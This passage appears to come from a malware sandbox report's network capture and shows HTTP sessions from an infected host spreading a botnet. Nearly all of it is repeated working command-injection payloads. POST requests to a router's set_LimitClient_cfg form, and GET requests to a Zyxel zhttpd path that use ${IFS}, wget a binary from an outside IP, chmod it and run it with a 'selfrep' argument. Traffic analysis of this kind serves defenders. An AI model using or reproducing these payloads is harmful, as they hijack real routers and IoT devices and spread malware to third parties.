                                              Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Mon, 29 Jan 2024 06:03:46 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: PS-000-01vAs132<br>URL: http://:8080/goform/set_LimitClient_cfg<br>Request-Id: 65b73fc2_PS-000-01vAs132_6450-44256<br><br>Check:<span class="C G" onclick="


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3551192.168.2.145483278.140.48.208080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.612823963 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:48.074912071 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:48.359602928 CET419INHTTP/1.1 400 Bad Request
                                              Date: Mon, 29 Jan 2024 06:03:48 GMT
                                              Server: Apache/2.4.29 (redos)
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3552192.168.2.1458562107.163.36.1838080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.642471075 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:48.266925097 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:50.186841011 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:03:54.090658903 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:01.770411015 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3553192.168.2.1455250111.33.138.1748080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.725724936 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3554192.168.2.145962834.107.215.1168080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.823896885 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3555192.168.2.1460166143.55.82.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948250055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3556192.168.2.1447010112.181.166.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948277950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3557192.168.2.14423265.86.245.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948328018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3558192.168.2.1437550136.112.3.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948362112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3559192.168.2.1445606110.228.176.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948404074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3560192.168.2.145825683.98.219.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948435068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3561192.168.2.1459492161.42.163.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948473930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3562192.168.2.145204037.95.55.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948514938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3563192.168.2.1447250204.249.162.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948546886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3564192.168.2.1448496167.56.71.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948587894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3565192.168.2.1456100128.206.10.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948642015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3566192.168.2.1450772153.133.146.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948677063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3567192.168.2.145733642.30.215.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948700905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3568192.168.2.1439878209.77.200.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948733091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3569192.168.2.143939886.189.180.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948772907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3570192.168.2.1456970162.2.89.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948806047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3571192.168.2.1453834132.240.214.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948847055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3572192.168.2.14451328.66.152.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948901892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3573192.168.2.145295443.69.139.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948930025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3574192.168.2.146055236.72.76.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948972940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3575192.168.2.1453604216.85.107.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.948996067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3576192.168.2.145338875.59.90.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949037075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3577192.168.2.144550063.0.19.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949059010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3578192.168.2.1442208191.101.145.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949095964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3579192.168.2.1437296115.87.81.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949141026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3580192.168.2.1436880116.123.68.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949186087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3581192.168.2.144550469.78.249.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949237108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3582192.168.2.146064892.150.169.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949275970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3583192.168.2.14392529.28.85.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949320078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3584192.168.2.1443444200.158.125.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949362040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3585192.168.2.1439598187.171.138.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949419975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3586192.168.2.145107678.178.211.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949450016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3587192.168.2.1438648166.38.227.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949485064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3588192.168.2.144716485.85.73.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949531078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3589192.168.2.1459940156.90.60.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:46.949551105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3590192.168.2.1453340208.101.122.78443
                                              TimestampBytes transferredDirectionData
